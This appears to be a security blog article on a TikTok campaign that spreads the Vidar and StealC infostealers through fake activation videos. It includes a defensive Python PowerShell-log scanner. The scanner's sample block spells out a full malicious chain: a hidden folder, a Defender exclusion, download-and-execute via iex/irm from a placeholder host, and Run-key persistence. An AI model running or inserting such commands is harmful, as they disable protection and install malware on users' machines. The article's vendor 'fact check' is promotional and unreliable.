TikTok Used as a Malware Delivery Tool: AI-Generated Videos Trick Users into Downloading Infostealers

Cybercriminals have found a new playground—and it’s none other than TikTok. In a clever and alarming twist, attackers are exploiting the platform’s viral nature by sharing instructional videos designed to trick users into running malicious PowerShell commands. These aren’t just ordinary scam clips—they appear AI-generated, perfectly mimicking tutorial-style content to mask their real purpose: the distribution of dangerous malware such as Vidar and StealC.

This new campaign marks a disturbing evolution in cyberattacks, shifting the battlefield from phishing emails and fake websites to dynamic video content and social platforms. The hackers’ goal is simple yet effective: convince unsuspecting users to execute commands that compromise their devices and exfiltrate sensitive data. This development underlines the need for greater vigilance, user education, and proactive cybersecurity strategies tailored to the age of algorithm-driven social manipulation.

TikTok’s Viral Threat: AI Videos Spreading Malware Through PowerShell

A recent investigation by Trend Research revealed a highly targeted and dangerous malware campaign that weaponizes TikTok to spread infostealers like Vidar and StealC. This isn’t your average phishing trick—it involves AI-generated videos posing as software activation tutorials that instruct viewers to run PowerShell commands. These commands silently download and execute malicious scripts on users’ systems, bypassing traditional security measures.

These deceptive videos have proven alarmingly effective, with one tutorial racking up nearly 500,000 views and over 20,000 likes. The accounts responsible, such as @gitallowed, @allaivo2, and @digitaldreams771, have since been deactivated. However, the scale and sophistication of the campaign suggest automation and AI were heavily used to produce near-identical content across multiple accounts.

Once executed, the PowerShell script downloads malware hosted on sites like allaivo[.]me and amssh[.]co. The script creates hidden directories, evades Windows Defender by excluding those paths, and ensures persistence by adding startup registry keys. Payloads are either Vidar or StealC—two notorious infostealers capable of capturing browser data, login credentials, crypto wallet info, and more.

Even more concerning is the use of legitimate platforms like Steam and Telegram as command-and-control (C&C) infrastructure, which makes these campaigns harder to detect. Vidar, for instance, hides C&C IPs within Steam profile bios and Telegram messages, bypassing traditional detection methods that scan for suspicious domains or files.

The technical breakdown of this campaign illustrates a new form of malware distribution where no malicious content is embedded in the video itself. Instead, the visual and auditory content persuades users to voluntarily compromise their own devices.

Security implications for businesses and individuals are profound. Organizations must rethink their strategies—relying solely on signature-based detection or link analysis is no longer sufficient. Behavioral analysis, social media monitoring, and advanced user awareness training are essential defenses in this evolving threat landscape.

Trend Vision One™, an AI-powered security platform, is equipped to detect these campaigns and offers tools for threat hunting, incident response, and proactive defense. Users of the platform can access detailed indicators of compromise (IOCs), real-time threat intelligence, and customized hunting queries to mitigate exposure.

Ultimately, the viral nature of TikTok, combined with AI-powered deception, has opened a new chapter in cyber warfare—one that merges entertainment, automation, and malicious intent.

What Undercode Says:

This campaign marks a defining moment in how malware is spread. The pivot to using video content, especially on platforms like TikTok, highlights a sophisticated understanding of both social media dynamics and human psychology. Threat actors are no longer simply pushing malware through malicious links or phishing emails—they are now using entertainment and visual persuasion to bypass our digital defenses.

At the core of this campaign is the manipulation of user trust. Instructional videos have become a trusted format for learning new tools, hacks, and tricks. By mimicking this format with AI-generated content, attackers blend into a sea of harmless tutorials. The malicious commands seem credible, especially to non-technical users who might not recognize PowerShell or understand the risks of running terminal commands from unknown sources.

The use of AI-generated voices and faceless accounts further dehumanizes the source, making the video feel neutral and professional. Automation likely played a large role in generating numerous versions of the same video, each slightly altered to avoid detection and expand the attack surface.

This isn’t just a cybersecurity issue—it’s a sociotechnical problem. As platforms like TikTok blur the lines between entertainment and instruction, users need stronger education on digital hygiene. Visual persuasion can override caution, especially when the instructions appear simple, helpful, and promising free software.

From a technical standpoint, the attack is brilliantly constructed. By having users execute the commands themselves, malware delivery bypasses many endpoint detection systems. There’s no phishing link to scan, no suspicious attachment to filter—just a user voluntarily installing malware while believing they’re unlocking features or activating software.

The command chain is deeply concerning. Attackers start by manipulating Windows Defender to exclude malicious folders from scans, essentially blinding local protection tools. From there, they establish persistence, hide their tracks, and maintain control through C&C servers cleverly masked as legit online services.

Corporate environments are particularly vulnerable. If one employee follows such a video at home and connects their infected device to a company network—or worse, runs the command on a work computer—the potential for data breaches multiplies. This campaign isn’t just about personal devices. It’s a scalable strategy that can impact large networks.

Social media threat monitoring and behavioral detection must now become standard practice. Organizations need to look beyond traditional antivirus solutions and begin investing in platforms that understand user context, track system behavior over time, and identify anomalies such as suspicious PowerShell usage.
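The behaviours the article attributes to the script (hidden directories, Windows Defender path exclusions, Run-key persistence, and a download-and-execute one-liner) are all visible in PowerShell script-block logging, which is where the "suspicious PowerShell usage" detection this paragraph calls for would start. The following triage scanner is an added example written for this page; it is not Trend Micro's, Trend Vision One's or Undercode's code. It assumes you already collect script-block text (for example Windows event ID 4104) and feed each block to `scan_block`. The rule names, severities and thresholds are my own choices, and the three sample blocks are constructed here, with `.invalid` hostnames, not captured campaign artifacts.

```python
"""Heuristic triage of PowerShell script-block text for the behaviours described
in the article: Defender exclusion tampering, Run-key persistence, hidden
directory creation and download-and-execute chains.

Added example for this page, not vendor code. Sample blocks are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str       # rule name (names chosen for this example)
    severity: int   # 1 (low) .. 5 (high)
    evidence: str   # matched fragment, shown to the analyst


def _rx(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.I)


# Single-pattern rules: (name, severity, regex). Each mirrors one behaviour the
# article describes rather than any specific campaign script.
PATTERN_RULES = [
    ("defender_exclusion", 4, _rx(r"Add-MpPreference\s+[^\n]*-Exclusion(Path|Process|Extension)")),
    ("defender_disable", 5, _rx(r"Set-MpPreference\s+[^\n]*-Disable\w+")),
    ("run_key_persistence", 4, _rx(r"(HKCU|HKLM|HKEY_\w+)[:\\][^\s'\"]*CurrentVersion\\Run")),
    ("hidden_directory", 2, _rx(r"(\.Attributes\s*(\+|\|)?=\s*['\"]?Hidden|\battrib(\.exe)?\s+\+h\b)")),
    ("stealth_flags", 3, _rx(r"-(EncodedCommand|enc|ec|ExecutionPolicy\s+Bypass|WindowStyle\s+Hidden)\b")),
]

# Download-and-execute needs BOTH a fetch and an evaluation primitive in the same
# block; a plain Invoke-WebRequest -OutFile on its own is ordinary admin work.
_DOWNLOAD = _rx(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer)\b")
_EXEC = _rx(r"\b(iex|Invoke-Expression)\b")


def scan_block(text: str) -> list[Finding]:
    """Return every rule that fires on one script block."""
    findings = []
    for name, severity, rx in PATTERN_RULES:
        m = rx.search(text)
        if m:
            findings.append(Finding(name, severity, m.group(0)))
    dl, ex = _DOWNLOAD.search(text), _EXEC.search(text)
    if dl and ex:
        findings.append(Finding("download_execute", 5, f"{dl.group(0)} ... {ex.group(0)}"))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """Sum of severities, capped at 10 so the scale stays readable on a dashboard."""
    return min(10, sum(f.severity for f in findings))


def verdict(score: int) -> str:
    if score >= 8:
        return "high: block and investigate"
    if score >= 4:
        return "medium: analyst review"
    return "low: no action"


# Constructed sample script blocks (not real campaign content; hosts are .invalid).
SAMPLES = {
    # Resembles the chain the article describes: hidden dir, exclusion, fetch+run, Run key.
    "activation_tutorial": r"""
$d = "$env:APPDATA\svc"; New-Item -ItemType Directory -Path $d -Force | Out-Null
(Get-Item $d).Attributes += 'Hidden'
Add-MpPreference -ExclusionPath $d
iex (irm 'https://malware-host.invalid/payload')
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name svc -Value "$d\svc.exe"
""",
    # Ordinary admin script: a download to disk with no execution primitive.
    "log_housekeeping": r"""
Get-ChildItem "$env:ProgramFiles" -Recurse -Filter *.log | Measure-Object
Invoke-WebRequest -Uri 'https://updates.example.invalid/notes.txt' -OutFile "$env:TEMP\notes.txt"
""",
    # A build engineer excluding a compiler output folder: worth a look, not an incident.
    "build_exclusion": r"""
Add-MpPreference -ExclusionPath 'D:\build\out'
""",
}


def triage_all(samples: dict[str, str]) -> dict[str, tuple[int, str]]:
    """Score every block; returns {name: (score, verdict)} for the test and the report."""
    return {name: (risk_score(scan_block(t)), verdict(risk_score(scan_block(t))))
            for name, t in samples.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        hits = scan_block(text)
        print(f"== {name}: score {risk_score(hits)} -> {verdict(risk_score(hits))}")
        for f in hits:
            print(f"   [{f.severity}] {f.rule}: {f.evidence}")
```

The two-condition `download_execute` rule is the design point: matching `Invoke-WebRequest` alone would page the SOC on every software update script, while requiring a fetch and an `iex` in the same block keys on exactly the "paste this command" pattern the videos push. Pair the score with context the article stresses, such as whether the parent process is a console the user typed into rather than a scheduled task, before escalating.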

Moreover, regulatory bodies may eventually need to step in. As AI-generated media becomes indistinguishable from real human content, platforms like TikTok must be held accountable for identifying and removing malicious instructional content. This is a new kind of cyber threat—visually coded, emotionally targeted, and algorithmically spread.

Fact Checker Results ✅

Verified: AI-generated TikTok videos are being used to spread Vidar and StealC malware.
Confirmed: Victims are socially engineered into executing PowerShell commands themselves.
Validated: Trend Micro’s tools, including Trend Vision One™, can detect and mitigate these threats. 🔍🛡️⚠️

Prediction 🔮

As attackers see success with TikTok-based malware distribution, similar campaigns will likely emerge on Instagram Reels, YouTube Shorts, and Facebook Stories. Expect future iterations to use deepfake presenters, enhanced AI-generated voices, and even chat-based interfaces to boost credibility. Businesses must brace for a future where video is no longer just entertainment—it’s the new frontline in cyberattacks.

References:

Reported By: www.trendmicro.com